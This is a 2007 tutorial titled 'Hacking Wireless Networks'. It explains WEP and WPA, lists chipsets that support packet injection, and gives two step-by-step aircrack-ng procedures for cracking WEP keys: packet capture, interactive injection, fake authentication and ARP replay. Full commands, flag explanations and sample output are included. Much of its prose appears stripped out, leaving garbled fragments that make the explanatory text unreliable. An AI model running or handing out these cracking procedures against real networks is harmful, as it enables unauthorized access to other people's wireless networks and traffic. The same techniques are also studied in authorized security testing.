HOWTO: Hacking Wireless Networks
Post on 30-May-2018
-
8/14/2019 HOWTO-Hacking Wireless Networks ,,
1/33
http://www.t0010.com
####################### Br0ken r0x ######################
# Lesson : Howto Hacking Wireless Networks step by step #
# Author: BrokeN-ProXy #
# Page: www.3asfh.net & www.sniper-sa.com #
# Contact Me 0nly email: br0ken.rlz@gmail.com #
# Msn Messenger : broken-proxy@hotmail.com #
###################### r0x just do it ####################
Hacking Wireless Networks
Copyright #~ BrokeN-ProXy #~ 2007
http://www.3asfh.net/vb/
http://www.sniper-sa.com/forums/
WARNING
WLAN
Wired Equivalent Privacy
Wi-Fi Protected Access
aircrack-ng
wireless tools
[ Monitor Mode ]
The attack method 1
The attack method 2
WARNING
(WLAN):
(WLAN \ wireless local area network) (radio frequency / RF)
- (wireless computer cards):
PCMCIA
USB
- (access point):
Institute of Electrical and Electronics Engineers (IEEE)
Internet Engineering Task Force (IETF)
Wireless Ethernet Compatibility Alliance (WECA)
International Telecommunication Union (ITU)
(WWAN):
WWAN (2G): Global System for Mobile Communications (GSM), Cellular Digital Packet Data (CDPD), Code Division Multiple Access (CDMA).
ITU.
Wireless metropolitan area networks (WMAN):
WMAN: multichannel multipoint distribution service (MMDS), local multipoint distribution services (LMDS)
IEEE 802.16.
(WLAN):
1997IEEE{WLANKb{
{K
a{.
Wireless personal area networks (WPAN):
WPAN: PDA, POS, Bluetooth
Bluetooth Special Interest Group (SIG)
WPAN, IEEE, Bluetooth 1.0
http://www.arabhardware.net/forum/showthread.php?t=27438&highlight=WLAN
WEP , WPA
- Wired Equivalent Privacy (WEP):
IEEE
WEP, RC4
64 bit OR 128 bit
[ Initialization Vector ] IV, RC4
WEP header, WEP, WPA
- Wi-Fi Protected Access (WPA):
WPA with RADIUS
WPA with PSK [pre shared key], Hexadecimal
TKIP (Temporal Key Integrity Protocol), WEP IV
Message Integrity Code, ARP Replay Attack, WEP IV
WPA: Deauthentication Attack, brute force attack
Aircrack Tools, Aircrack-ng Tools
NETGEAR Or Linksys
[Chipset]: Atheros
www.aircrack-ng.org
The best chipset nowadays is Atheros. It is very well supported under Linux, and also under Windows (PCMCIA/CardBus only). Neither support any USB wireless devices. The latest madwifi-ng patch makes it possible to inject raw 802.11 packets in either in Managed and Monitor mode at arbitrary b/g speeds.
[ chipset, airodump, aireplay ]
Chipset | Supported by airodump for Windows | Supported by airodump for Linux | Supported by aireplay for Linux
Atheros | CardBus: YES, PCI: NO (see CommView) | YES | YES (driver patching required)
Atmel | UNTESTED | 802.11b YES, 802.11g UNTESTED | UNTESTED
Broadcom | Old models only (BRCM driver) | YES | IN PROGRESS (Forum thread)
Centrino b | NO | PARTIAL (ipw2100 driver doesn't discard corrupted packets) | NO
Centrino b/g | NO | YES | NO (firmware drops most packets) ipw2200inject
Centrino a/b/g | NO | YES | NO (See this thread for alpha injection support.)
Cisco Aironet | YES? | YES | NO (firmware issue)
Hermes I | YES | YES | NO (firmware corrupts the MAC header)
NdisWrapper | N/A | Never | Never
Prism2/3 | NO | YES | YES (PCI and CardBus only, driver patching required)
PrismGT | YES | FullMAC: YES, SoftMAC: NOT YET | YES (driver patching recommended)
Ralink | NO | YES (rt2500 / rt2570 / rt61 / rt73 driver) | YES, see rt2500, rt2570, rt61 and rt73. Also see Ralink chipset comments later on this page for important concerns
RTL8180 | YES | YES | UNSTABLE (driver patching required)
RTL8187L | UNTESTED | YES (driver patching required to view power levels) | YES (driver patching recommended for injection and required to view power levels)
TI (ACX100/ACX111) | NO | YES | YES (driver patching required)
ZyDAS 1201 | NO | YES | Partially (See patch for details)
ZyDAS 1211[B] | NO | YES | YES
Others (Marvel...) | NO | UNKNOWN | NO
kernel headers, gcc
Debian [ Ubuntu , Xubuntu , Knoppix ]:
sudo apt-get install build-essential
Aircrack:
wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz
tar -zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make install
wireless tools
wget http://pcmcia-cs.sourceforge.net/ftp/contrib/wireless_tools.28.tar.gz
tar xvfz wireless_tools.28.tar.gz
cd wireless_tools.28
make
make install
iwconfig, iwlist
iwlist (wireless tools)
scan all network around
bt ~ # iwlist ath0 scan
ath0      Scan completed :
          Cell 01 - Address: 00:14:7F:1F:27:6D
                    ESSID:"SpeedTouch433793"
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Quality=60/94  Signal level=-35 dBm  Noise level=-95 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                              24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
                              12 Mb/s; 48 Mb/s
                    Extra:bcn_int=100
                    Extra:wme_ie=dd180050f2020101880003a4000027a4000042435e0062322f00
          Cell 02 - Address: 00:18:39:24:5C:F8
                    ESSID:"linksys"
                    Mode:Master
                    Frequency:2.427 GHz (Channel 4)
                    Quality=50/94  Signal level=-45 dBm  Noise level=-95 dBm
                    Encryption key:off
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:bcn_int=100
                    Extra:wme_ie=dd180050f2020101030003a4000027a4000042435e0062322f00
[ Monitor Mode ]
Aircrack, Monitor, sniffing: Monitor mode, Managed
Monitor Mode: command line, airmon-ng (Aircrack)
Managed:
bt ~ # iwconfig ath0
ath0      IEEE 802.11b  ESSID:""  Nickname:""
          Mode:Managed  Channel:0  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
Monitor Mode: command line
bt ~ # ifconfig ath0 down
bt ~ # wlanconfig ath0 destroy
bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ath0
bt ~ # ifconfig ath0 up
bt ~ # iwconfig ath0
ath0      IEEE 802.11b  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.412 GHz  Access Point: 00:0F:B5:EA:2F:AF
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
Monitor Mode: airmon-ng (Aircrack)
bt ~ # airmon-ng stop ath0
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
eth0            Centrino b/g    ipw2200
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt ~ # airmon-ng start wifi0
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
eth0            Centrino b/g    ipw2200
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
bt ~ # iwconfig ath0
ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.457 GHz  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-94 dBm  Noise level=-94 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
The attack method 1
Monitor, interactive, arp request, ivs, 64 bit, 128 bit
airodump-ng capture packets
aireplay-ng -interactive attack modes [ injection packets ]
aircrack-ng crack WEP , WPA
(1) airodump-ng
airodump-ng -c 11 --bssid 00:14:7F:1F:27:6D -w capture ath0
-c : channel number
--bssid : MAC address of the access point
-w : save the capture to a file
capture : name of the file the packets are saved to
ath0 : our interface name
(2) aireplay-ng interactive
aireplay-ng --interactive -b 00:14:7F:1F:27:6D -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:13:CE:6D:61:59 ath0
--interactive : attack mode
-b : MAC address of the access point
-d : destination MAC (broadcast)
-m 68 : minimum packet length
-n 68 : maximum packet length
-p 0841 : sets the frame control
-h : MAC address of the client
ath0 : our interface name
(3) increase the packets
(4) aircrack-ng
aircrack-ng -b 00:14:7F:1F:27:6D capture.cap
-b : MAC address of the access point
capture.cap : capture file
The attack method 2
Fake authentication
arp request, arp replay
airmon-ng switch to monitor mode
airodump-ng capture packets
aireplay-ng attack modes fake authentication
aireplay-ng attack modes arpreplay
aircrack-ng crack WEP , WPA
(1) airodump-ng
airodump-ng -c 6 --bssid 00:14:6C:1A:98:8C -w output ath0
-c : channel number
--bssid : MAC address of the access point
-w : save the capture to a file
output : name of the file the packets are saved to
ath0 : our interface name
(2) aireplay-ng fake authentication
aireplay-ng --fakeauth 6000 -o 1 -q 10 -e DataCenter -a 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
--fakeauth : attack mode
-o 1 : send only one set of packets at a time
-q 10 : send keep-alive packets every 10 seconds
-e : name of the access point
-a : MAC address of the access point
-h : MAC address of our card
ath0 : our interface name
(3) aireplay-ng arpreplay
arp request
aireplay-ng --arpreplay -b 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
--arpreplay : attack mode
-b : MAC address of the access point
-h : MAC address of our card
ath0 : our interface card
(3) increase the packets
(4) aircrack-ng
aircrack-ng -b 00:14:6C:1A:98:8C output.cap
-b : MAC address of the access point
output.cap : capture file
Attack-method 1 ( 124 MB )
http://www.4shared.com/file/24526019/8831b5f1/attack-method1part1.html?dirPwdVerified=630ebe35 50MB
http://www.4shared.com/file/24546586/40c72462/attack-method1part2.html?dirPwdVerified=630ebe35 50MB
http://www.4shared.com/file/24548769/ada0b720/attack-method1part3.html?dirPwdVerified=630ebe35 24MB
Attack-method 2 ( 113 MB )
http://www.4shared.com/file/24553904/65b4efa0/attack-method2part1.html?dirPwdVerified=24884433 50MB
http://www.4shared.com/file/24590482/9b931121/attack-method2part2.html?dirPwdVerified=24884433 50MB
http://www.4shared.com/file/24592271/2b86e86d/attack-method2part3.html?dirPwdVerified=24884433 13MB
(September 23, 2007)